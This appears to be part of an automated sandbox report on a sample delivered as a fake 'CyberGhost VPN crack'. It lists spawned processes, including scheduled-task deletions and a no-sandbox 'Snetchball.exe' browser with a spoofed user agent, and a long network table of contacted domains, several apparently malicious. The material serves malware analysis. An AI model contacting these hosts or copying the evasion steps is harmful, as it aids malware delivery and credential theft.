"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4908 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jhnbW1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dRKdk1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "IdVtZOOUCgewbUgTH"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5312 -ip 5312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 7124 -ip 7124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2384
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4264 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\PASSWORD 123.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.co | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 8.8.8.8:53 | jfilte.com | udp |
| US | 172.67.140.254:443 | jfilte.com | tcp |
| US | 172.67.140.254:443 | jfilte.com | tcp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.140.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.hcaptcha.com | udp |
| US | 104.19.229.21:443 | www.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 104.19.230.21:443 | newassets.hcaptcha.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | api2.hcaptcha.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 200.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.229.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.230.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 104.19.229.21:443 | imgs3.hcaptcha.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| BE | 23.14.90.74:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 74.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 172.67.138.9:443 | senzamenuzaes.shop | tcp |
| US | 8.8.8.8:53 | 9.138.67.172.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 224.74.21.104.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| US | 8.8.8.8:53 | 111.248.149.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | z3j.ru | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.60.120:443 | z3j.ru | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | chatgptencoder.site | udp |
| US | 172.67.196.56:443 | chatgptencoder.site | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 8.8.8.8:53 | bobisawinner.xyz | udp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 8.8.8.8:53 | 120.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.196.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.241.163.95.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 231.88.117.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 185.26.182.111:443 | features.opera-api2.com | tcp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 20.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.216.145.82.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.11.89:443 | download5.operacdn.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 89.11.18.104.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| SE | 2.21.96.115:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 115.96.21.2.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| BE | 88.221.83.184:443 | r.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 184.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 204.79.197.237:443 | rewards.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sup4tsk.biz | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | 39.88.117.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | 238.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 8.195.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 8.8.8.8:53 | api2.check-data.xyz | udp |
| US | 44.237.26.169:80 | api2.check-data.xyz | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 12.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.26.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 8.8.8.8:53 | www.rapidfilestorage.com | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| US | 8.8.8.8:53 | api5.check-data.xyz | udp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 44.237.26.169:443 | api5.check-data.xyz | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 44.237.26.169:443 | api5.check-data.xyz | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 44.237.26.169:443 | api5.check-data.xyz | tcp |
| US | 44.237.26.169:443 | api5.check-data.xyz | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.66.22.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | rfiles4.tracemonitors.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | rfiles1.tracemonitors.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| RU | 80.78.240.92:443 | rfiles1.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | 53.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.240.78.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients66.google.com | udp |
| US | 8.8.8.8:53 | clients39.google.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 34.217.172.173:443 | api5.check-data.xyz | tcp |
| US | 34.217.172.173:443 | api5.check-data.xyz | tcp |
| US | 8.8.8.8:53 | clients66.google.com | udp |
| US | 8.8.8.8:53 | 173.172.217.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients39.google.com | udp |
| US | 8.8.8.8:53 | sup4tsk.biz | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | clients66.google.com | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.187.206:443 | encrypted-tbn2.gstatic.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.187.206:443 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn1.gstatic.com | tcp |
